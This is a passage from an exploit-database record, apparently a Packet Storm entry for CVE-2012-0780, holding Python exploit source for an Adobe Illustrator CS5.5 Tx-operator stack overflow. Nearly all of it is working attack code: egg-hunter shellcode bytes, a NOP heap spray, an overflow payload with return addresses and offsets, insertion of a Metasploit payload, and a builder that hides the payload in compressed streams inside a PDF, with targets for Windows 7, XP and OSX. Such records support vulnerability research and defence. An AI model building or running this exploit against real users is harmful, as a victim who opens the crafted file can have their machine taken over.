EAX \nsearch += '\\x3D'+struct.pack('<L',token) #cmp EAX, $token \nsearch += '\\x75\\xF8' #jnz %search \nsearch += '\\x89\\xe0' #mov eax,esp \nsearch += '\\x81\\xec'+struct.pack(\"<L\",0x1000) #sub esp, 0x1000 \nsearch += '\\x89\\xe5' #mov ebp,esp \nsearch += '\\xFF\\xD0' #CALL EAX \n##Second crash fix stack \n# Search for stack signature (Tested in 15.0.0 15.0.1 15.0.2) \n# 00000045 \n# 00000001 \n# 00000000 \n# 00000045 \nsearch += '\\x81\\xc4'+struct.pack(\"<L\",0x1000) #add esp, 0x1000 \nsearch += '\\x58' #POP EAX \nsearch += '\\x40' #INC EAX \nsearch += '\\x83\\xF8\\x46' #CMP EAX,46 \nsearch += '\\x75\\xF9' #JNE SHORT loop \n### \nsearch += '\\x58' #POP EAX \nsearch += '\\x40' #INC EAX \nsearch += '\\x83\\xF8\\x02' #CMP EAX,02 \nsearch += '\\x75\\xF9' #JNE SHORT loop \n### \nsearch += '\\x58' #POP EAX \nsearch += '\\x40' #INC EAX \nsearch += '\\x83\\xF8\\x01' #CMP EAX,01 \nsearch += '\\x75\\xF9' #JNE SHORT loop \n### \nsearch += '\\x58' #POP EAX \nsearch += '\\x40' #INC EAX \nsearch += '\\x83\\xF8\\x46' #CMP EAX,46 \nsearch += '\\x75\\xF9' #JNE SHORT loop \n#Fix frame and return \nsearch += '\\x83\\xEC\\x1C' #SUB ESP,1C \nsearch += '\\x5d' #POP EBP \nsearch += '\\xc3' #RET \n \nbaseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='\\x90',tail=search)*300 ) \nelse: \n#DEBUG \ndef pattern(size): \ndef _pattern(): \nfor i in xrange(ord('a'),ord('z')+1): \nfor j in xrange(ord('0'),ord('9')+1): \nfor k in xrange(ord('A'),ord('Z')+1): \nfor h in xrange(ord('0'),ord('9')+1): \nyield chr(i) \nyield chr(j) \nyield chr(k) \nyield chr(h) \nreturn ''.join(list(_pattern())[:size]) \np = pattern(3000) \nai_data = baseai.replace('($PATTERN$)', '('+p+')').replace('$HEAPSPRAY$',getXImage(1020,1024)*20) \nreturn ai_data \n \n#prepare shellcode.. \nif options.payload: \nmsfpayload = args[1] \n \ncode = makeASCIICode(msfpayload) \n \nsearch = '\\x58' #search: pop EAX \nsearch += '\\x3D'+struct.pack('<L',token) #cmp EAX, $token \nsearch += '\\x75\\xF8' #jnz %search \nsearch += '\\x89\\xe0' #mov eax,esp \nsearch += '\\x89\\xe5' #mov ebp,esp \nsearch += '\\xFF\\xD0' #CALL EAX \npayload = search \npayload += 'A'*(268 - len(payload)) \npayload += struct.pack('<L',jmp_addr) #offset 268 \npayload += 'B'*(352 - len(payload)) \npayload += struct.pack('<L', write_addr) #offset 352 (originally a heap address) \npayload += 'C'*(376 - len(payload)) \npayload += struct.pack('<L',token) #offset 376 \npayload += code #offset 380 \n \nassert len(payload)<=0x3000, 'Payload too long!, it may hit the end of the stack' \n#Double check it doesn't have invalid chars... \nfor c in search: \nassert not ord(c) in invalid, 'c:%s is in %s'%('%02x'%ord(c),['\\\\x%02x'%x for x in invalid]) \n \n#Write the string in octal form \nai_data = baseai.replace('$PATTERN$', ''.join(['\\\\%o'%ord(i) for i in payload])) \n \n#ai_data holds the ai private data to we inserted in the pdf shell \nreturn ai_data \n \ndef mkPDFShell(ai_data): \n#The document \ndoc = PDFDoc() \n#font \nfont = PDFDict() \nfont.add('Name', PDFName('F1')) \nfont.add('Subtype', PDFName('Type1')) \nfont.add('BaseFont', PDFName('Helvetica')) \n#name:font map \nfontname = PDFDict() \nfontname.add('F1',font) \n#resources \nresources = PDFDict() \nresources.add('Font',fontname) \n#contents \ncontents= PDFStream({},'BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito Pedefeon!) Tj ET') \ndoc.add(contents) \n#begin illustrator bit \nprivate = PDFDict() \nillustrator = PDFDict() \n \n#slice the private data in 64k packs \ndata = ai_data \ncompress = {} \nchunk_size = 0xffff*20 \nfor i in xrange(0,len(data)/chunk_size+1): \npriv_data = PDFStream({'Filter': '/FlateDecode'},data[chunk_size*i:chunk_size*(i+1)].encode('zlib')) \nhsh = hashlib.md5(priv_data.stream) \nif not hsh.hexdigest() in compress.keys(): \ndoc.add(priv_data) \nref = PDFRef(priv_data) \ncompress[hsh.hexdigest()] = ref \nprivate.add('AIPrivateData%d'%(i+1),ref) \n \nprivate.add('NumBlock',PDFNum(len(data)/0xffff+1)) \nprivate.add('ContainerVersion',PDFNum(15.0)) \nprivate.add('CreatorVersion',PDFNum(15.0)) \nprivate.add('RoundtripVersion',PDFNum(15.0)) \n \nillustrator.add('LastModified',PDFString('D:20110202124811-07\\'00\\'')) \nillustrator.add('Private',PDFRef(private)) \n \ndoc.add(private) \ndoc.add(illustrator) \n#page \npage = PDFDict() \npage.add('Type',PDFName('Page')) \npage.add('Resources',resources) \npage.add('Contents', PDFRef(contents)) \npage.add('PieceInfo',PDFDict({'Illustrator': PDFRef(illustrator)})) \ndoc.add(page) \n#pages \npages = PDFDict() \npages.add('Type', PDFName('Pages')) \npages.add('Kids', PDFArray([PDFRef(page)])) \npages.add('Count', PDFNum(1)) \n#add parent reference in page \npage.add('Parent',PDFRef(pages)) \ndoc.add(pages) \n#catalog \ncatalog = PDFDict() \ncatalog.add('Type', PDFName('Catalog')) \ncatalog.add('Pages', PDFRef(pages)) \ndoc.add(catalog) \ndoc.setRoot(catalog) \nreturn str(doc) \n \n \nif __name__ == '__main__': \n \nparser = optparse.OptionParser(description='Adobe Illustrator File Format Tx operator Stack Overflow') \nparser.add_option('--debug', action='store_true', default=False, help='For debugging') \nparser.add_option('--multi', action='store_true', default=False, help='Heapspraying for multitarget') \nparser.add_option('--w7', action='store_true', default=False, help='For Windows7') \nparser.add_option('--xp', action='store_true', default=False, help='For Windows XP (generic)') \nparser.add_option('--osx', action='store_true', default=False, help='For OSX (tested on plain leopard)') \nparser.add_option('--payload', action='store_true', default=False, help=\"Metasploit payload. Ex. 'windows/exec CMD=calc.exe'\") \nparser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation') \n(options, args) = parser.parse_args() \nif not options.w7 + options.xp + options.debug + options.multi + options.osx + options.doc== 1: \nprint 'Try --help' \nexit(-1) \nelif options.doc: \nprint __doc__ \nexit(0) \n \nai_data = mkAIPrivate(options) \nprint mkPDFShell(ai_data) \n \n#f/ \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/113642/illustrator_cs5.5_tx_operator_issue_-_cve-2012-0780.txt"}]}
